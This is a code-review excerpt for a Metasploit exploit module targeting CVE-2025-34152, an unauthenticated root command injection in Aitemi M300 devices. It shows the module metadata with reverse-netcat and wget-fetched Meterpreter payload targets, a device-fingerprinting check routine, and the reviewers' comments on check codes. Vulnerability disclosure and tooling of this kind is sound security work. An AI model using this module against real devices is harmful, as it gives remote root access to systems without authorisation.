modules/exploits/linux/http/aitemi_m300_time_rce.rb

```diff
@@ -0,0 +1,129 @@
+          unsanitized to a shell command executed via the `date -s` mechanism. The injection
+          executes with root privileges, without requiring authentication, reboot, or
+          network reconfiguration.
+        },
+        'Author' => [
+          'Valentin Lobstein' # Vulnerability discovery and Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],
+          ['CVE', '2025-34152']
+        ],
+        'Platform' => %(linux unix),
+        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
+        'Targets' => [
+          [
+            'Unix Command Shell (reverse_netcat)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_CMD, ARCH_MIPSBE],
+              'DefaultOptions' => {
+                'FETCH_DELETE' => true,
+                'FETCH_COMMAND' => 'WGET',
+                'FETCH_WRITABLE_DIR' => '/tmp',
+                'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => true,
+        'DisclosureDate' => '2025-08-07',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    fingerprint_hits = []
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'favicon.ico')
+    )
+
+    return CheckCode::Unknown('No response from target') unless res
+    return CheckCode::Safe('favicon.ico not found') unless res.code == 200
+
+    hash = Digest::SHA256.hexdigest(res.body)
+    if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'
+      print_good('Favicon hash matched – likely Aitemi M300 device')
+      fingerprint_hits << 'favicon'
+    end
+
+    server_header = res.headers['Server']
+    if server_header&.start_with?('lighttpd/1.4.32')
+      print_good("HTTP server version matched: #{server_header}")
+      fingerprint_hits << 'httpd'
+    end
+
+    %w[index.html home.html].each do |page|
+      res_html = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, page)
+      )
+
+      next unless res_html&.code == 200
+
+      if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')
+        print_good("HTML fingerprint matched in #{page} – UI strings detected")
+        return CheckCode::Vulnerable('HTML language markers confirmed')
```

Comment:
I would suggest `Appears` as `Vulnerable` is used when you trigger vulnerability to confirm exploitability
```suggestion
        return CheckCode::Appears('HTML language markers confirmed')
```
Also, I assume this is unpatched, or is there a upper vulnerable version?

Reply:
> Based on the surrounding code, it also looks like this might be intending to append additional entries to the `fingerprint_hits` array.

The `fingerprint_hits` array in `check` is only used to collect partial matches for display to the user in the `CheckCode` message.
It is not intended to be persisted or used elsewhere in the module beyond the `check` method.